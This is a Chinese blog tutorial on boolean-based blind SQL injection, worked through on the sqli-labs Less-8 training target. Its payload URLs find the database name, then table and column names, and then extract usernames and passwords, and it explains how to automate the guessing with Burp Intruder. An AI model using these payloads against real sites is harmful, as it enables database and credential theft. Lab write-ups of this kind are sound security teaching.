SQL注入之布尔盲注入(一)

最新推荐文章于 2024-06-20 12:04:49 发布
最新推荐文章于 2024-06-20 12:04:49 发布
阅读量927 收藏 1
点赞数 2
分类专栏: WEB安全 文章标签: WEB安全 SQL注入 SQL盲注入
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/skynet_x/article/details/102917938
版权

关于函数substring用法:
eg:substring(appache,1,3) 结果:app 即从第一位开始截取三位
在这里插入图片描述
以sqli-labs-master中第八关为例进行演示:
1.判断数据库名长度
在这里插入图片描述

http://172.16.32.128/sqli-labs-master/Less-8/?id=1' and length(database())=8 --+

当长度为9时页面返回值为假,得知数据库名长度为8

2.判断数据库名的第一个字母是否为a(或A) ?

http://172.16.32.128/sqli-labs-master/Less-8/?id=1' and substring(database(),1,1)='a'--+

在这里插入图片描述
根据查询结果返回值为假,则数据库名第一个字母不是a,更改要判断的字母以及判断位置,直到将数据库名查询出来。真值结果如下所示。
在这里插入图片描述
3.在这里可以借助burp suite实现快速查询,避免手动查询的繁琐
在字符a上添加一个payload标记
在这里插入图片描述
在intruder设置中选择payload为从a-z,开始攻击
在这里插入图片描述
根据返回值的长度判断出数据库名第一个字符为s,改变判断位置再次执行相同的攻击,根据返回值长度判断出数据库名第二个字符为e,其余的字符只需更改判断位置即可,不再赘述。
在这里插入图片描述
4.已知数据库名为security,现在开始获取表名

http://172.16.32.128/sqli-labs-master/Less-8/?id=1' and substring((select group_concat(table_name) from information_schema.tables where table_schema='security') ,1,1)='a'--+

判断第一张表的第一个字符是否为a,修改判断位置,其余方法一致,直到所有的表被判断出来,在这里提醒一个技巧,可在payload中加入一个英文逗号,以此来判断表名是否结束,比如在判断为止为7的时候,判断出来的字符为’,’ 即表示第一张表结束 完整表名为emails
在这里插入图片描述
5.已知数据库名,表名,查询表中的字段,方法同上

http://172.16.32.128/sqli-labs-master/Less-8/?id=1' and substring((select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users') ,1,1)='a'--+

6.已知数据库名、表名、表中字段,现查users表中username和password字段中的内容,账号密码以’^'隔开以便区分,至此注入完毕。

http://172.16.32.128/sqli-labs-master/Less-8/?id=1' and substring((select group_concat(username,'^',password) from security.users) ,1,1)='c'--+

提示:
1.以上的字符判断不区分大小写,但账号密码大小写敏感,对于密码大小写可用ASCII码进行判断
2.盲注入较为繁琐,了解原理之后可采用自动化注入
在这里插入图片描述

skynet_x
关注
  • 2
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 2
    评论
专栏目录
Web安全SQL注入布尔盲注原理+步骤+实战操作
wangyuxiang946的博客
05-13 2312
这篇文章为大家解析布尔盲注实现原理,结合实战案例讲解布尔盲注使用步骤
sql注入详解
热门推荐
good good study
05-05 20万+
SQL注入SQL Injection)是一种常见的Web安全漏洞,主要形成的原因是在数据交互中,前端的数据传到后台处理时,没有做严格的判断,导致其传的“数据”拼接到SQL语句中后,被当作SQL语句的一部分执行。 从而导致数据库受损(被脱库、被删除、甚至整个服务器权限陷)。 即:注产生的原因是后台服务器接收相关参数未经过滤直接带数据库查询...
sql注入-布尔盲注
WolvenSec的博客
06-02 1258
布尔盲注(Boolean Blind SQL Injection)是一种SQL注入攻击技术,用于在无法直接获得查询结果的情况下推断数据库信息;它通过发送不同的SQL查询来观察应用程序的响应,进而判断查询的真假,并逐步推断出有用的信息。接着我们以DVWA靶场中的为例子进行解释;可以看到该靶场只能显示数据库中是否存在该ID,并不会显示其他数据,那么此时我们就无法直接获得查询结果的情况下推断数据库信息,因此联合查询已经无法满足要求,那么我们就可以使用布尔盲注或其他的注思想突破。
sql注入布尔盲注
ljj20020718的博客
11-25 379
sql注入布尔盲注
SQL注入原理及实践(一)–SQL注入布尔盲注
dulirongdudu的博客
08-02 2143
当不知道数据库返回值的情况下时【无回显】,输1’and‘1’='1和1’and‘1’='2显示不一样,仅返回正确、或者错误的页面时,存在布尔盲注。①if()if(条件,结果1,结果2)如果条件成立,则输出结果1,否则输出结果2。if(SUBSTRING(参数1,参数2,参数3),结果1.结果2)②字符串截取函数SUBSTRING(参数1,参数2,参数3)当假设长度为4时,返回正确的界面,因此数据库为4位字符串。1’and‘1’='1为真返回正确的界面。.....................
SQL注入布尔盲注完整解析
qq_28092985的博客
11-06 2104
这里写自定义目录标题注原理实战利用函数解释sqli-labs-Less5初级使用(length + ascii + substr)进阶使用(length + ascii + substr + limit)总结 注原理 布尔盲注在注时无回显的情况下适用,原理是应用系统在根据where+and语句进行查询时进行布尔判断即结果真或假,例如select * from admin where id=1 and 1=1,一般查询中应用系统仅接受 id变量值去拼接sql语句进行查询,但使用过union联合查询的小伙
sql注入整理之布尔盲注
qq_37079022的博客
07-14 1808
1' and ascii(substr(database(),1,1))=1 -- 使用ascii将值变为数字。1' and substr(database(),1,1)='a' -- 显示 不存在。1' and substr(database(),1,1)='b' -- 显示 不存在。1' and substr(database(),1,1)='c' -- 显示 不存在。1' and substr(database(),1,1)='a' -- 显示 不存在。
SQL注入布尔盲注
DM766924的博客
09-13 1567
什么是布尔判断SQL注入? “布尔判断”指的是利用SQL语句**逻辑与(and)**操作,判断and两边的条件是否成立,SQL语句带库查询后判断返回内容(通常返回值仅有非空和空两种状态),类似布尔型的true和false的两种状态。 布尔盲注步骤: 第1步:确认注点 方法:通过增加 ’ 和增加--+注释符,语句从执行失败变为执行成功判断注点 第2步:判断数据库版本 方法:主要因为5.0版本以下没有information_schema数据库,无法进行手动注; 由于无法回显数据,利用逻辑
sql注入布尔盲注的学习记录
dalaojiaoweb的博客
06-20 813
web的学习过程中师傅们最需要的就是耐心,希望师傅们一定要自己去全部测试一遍,不要觉得麻烦。在sql注入中最常用的就是布尔盲注,如果师傅们需要提高注效率我们可以使用python脚本来进行一个爬虫。这里我贴上一个脚本在实际使用中我们需要对脚本进行更改。res=''l=0r=127mid=(l+r)>>1#这一行是二分查找的核心,计算当前查找区间的中间位置。这里使用了位移运算符>>来实现除以2并向下取整的效果,等同于(l + r) // 2,但位移运算通常更快。
upload-labs-master Pass1-20笔记
skynet_x的博客
10-27 4048
实验环境: Windows 7 X64 Phpstudy 2018 PHP 5.4.45 Apache/2.4.23 pass01 — JS限制 开启burp抓包,尝试上传eval.php,点击上传后页面直接提示该文件不允许上传,而burp并没有截取到数据包,判断为JS限制。 F12将JS限制代码找出来,将代码复制到console,修改允许上传的后缀为php再运行 点击上传后显示上传成功,在下方回显的地方右键复制图片地址即可获取上传后的图片路径。 为了直观查看上传的文件有没有被执行,在上传的文件中均是
XSS闯关小游戏通关笔记
skynet_x的博客
10-29 1189
level1 — 无过滤 查看源码,没有任何的过滤。 直接在链接中构造最基本的XSS弹窗即可,弹窗内容为123. <script>alert(123)</script> level2 — input中未设置过滤 查看源码,发现在echo输出中有一个函数htmlspecialchars() htmlspecialchars() 函数把预定义的字符转换为 HTML 实体。可以看成是对特定字符的过滤。 预定义的字符是: & (和号)成为 & " (双引号)成为 "
Sqli-labs-master less1-22笔记
skynet_x的博客
10-28 496
#Sqli-labs-master 1-22 实验环境:Windows7 x64 专业版 ​ PHPstudy 2018 ​ PHP版本 5.4.45 ​ 靶机:Sqli-labs-master 注:LESS1-10为GET型注 11-22为POST型注 每道题解法不一定唯一 对于手法重复的关卡均未赘述 ##第一关:单引号报错 本关所用到的函数: ​ database() ---- 数据库 ​ concat(str1,str2,…) ---- 没有
SQL注入布尔盲注(二)
skynet_x的博客
11-05 216
1.首先了解一下在SQL中if语句的用法 IF( expr1 , expr2 , expr3 ) expr1 的值为 TRUE,则返回值为 expr2 expr2 的值为FALSE,则返回值为 expr3 结合sleep()可以构成基于时间盲注SQL语句 http://172.16.32.128/sqli-labs-master/Less-8/?id=1' and if (substri...
PPO算法,即Proximal Policy Optimization(近端策略优化).pdf
08-05
PPO算法,即Proximal Policy Optimization(近端策略优化),是一种在强化学习领域中广泛应用的策略梯度方法。由OpenAI在2017年提出,PPO旨在解决传统策略梯度方法中策略更新过大导致的训练不稳定问题。它通过引限制策略更新范围的机制,在保证收敛性的同时提高了算法的稳定性和效率。 一、PPO算法简介 PPO算法的核心思想是通过优化一个特定的目标函数来更新策略,但在这个过程中严格限制策略变化的幅度。具体来说,PPO引了裁剪(Clipping)和信赖域(Trust Region)的概念,以确保策略在更新过程中不会偏离太远,从而保持训练的稳定性。 二、PPO算法的主要变体 PPO算法主要有两种变体:裁剪版(Clipped PPO)和信赖域版(Adaptive KL Penalty PPO)。其中,裁剪版PPO更为常见,它通过裁剪概率比率来限制策略更新的幅度,而信赖域版PPO则使用KL散度作为约束条件,并通过自适应调整惩罚系数来保持策略的稳定更新。PPO算法,即Proximal Policy Optimization(近端策略优化),是一种在强化学习领域中广
GC032A datasheet(侵删)
08-05
GC032A datasheet(侵删)
opencv的概要介绍与分析
08-05
OpenCV (Open Source Computer Vision Library) 是一个开源的计算机视觉和机器学习软件库。它提供了大量的算法和函数,可用于图像处理、视频分析、特征检测、对象识别等多种应用。下面是一些关于 OpenCV 的资源描述,帮助您学习和使用这项强大的技术。 ### OpenCV 资源描述 #### 1. **官方文档和GitHub仓库** - **GitHub 仓库**:OpenCV 的官方 GitHub 仓库是获取最新代码、预训练模型、开发指南和示例代码的地方。这是了解 OpenCV 最新进展和功能的最佳起点。 - **官方文档**:OpenCV 的官方文档包含了详细的使用说明、API 参考和常见问题解答。 #### 2. **在线教程和课程** - **Codecademy**:Codecademy 提供了互动式的 OpenCV 课程,适合完全的新手。 - **freeCodeCamp**:freeCodeCamp 是一个非营利性组织,提供免费的编码课程,包括 OpenCV 基础。 #### 3. **书籍** - **《Learning
基于python3+opencv3做的中国车牌识别源码+文档说明+使用说明
最新发布
08-05
<项目介绍> 算法思想来自于网上资源,先使用图像边缘和车牌颜色定位车牌,再识别字符。车牌定位在predict方法中,为说明清楚,完成代码和测试后,加了很多注释,请参看源码。车牌字符识别也在predict方法中,请参看源码中的注释,需要说明的是,车牌字符识别使用的算法是opencv的SVM, opencv的SVM使用代码来自于opencv附带的sample,Stat - 不懂运行,下载完可以私聊问,可远程教学 该资源内项目源码是个人的毕设,代码都测试ok,都是运行成功后才上传资源,答辩评审平均分达到96分,放心下载使用! 1、该资源内项目代码都经过测试运行成功,功能ok的情况下才上传的,请放心下载使用! 2、本项目适合计算机相关专业(如计科、人工智能、通信工程、自动化、电子信息等)的在校学生、老师或者企业员工下载学习,也适合小白学习进阶,当然也可作为毕设项目、课程设计、作业、项目初期立项演示等。 3、如果基础还行,也可在此代码基础上进行修改,以实现其他功能,也可用于毕设、课设、作业等。 下载后请首先打开README.md文件(如有),仅供学习参考, 切勿用于商业用途。 --------
sql注入布尔盲注流程
06-28
SQL注入布尔盲注是一种利用SQL注入技术来检测查询结果是否满足某个条件的攻击方法,它通常在应用程序中用于验证用户输时使用。以下是SQL注入布尔盲注的基本流程: 1. **识别可注点**:攻击者首先尝试找出页面上...
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值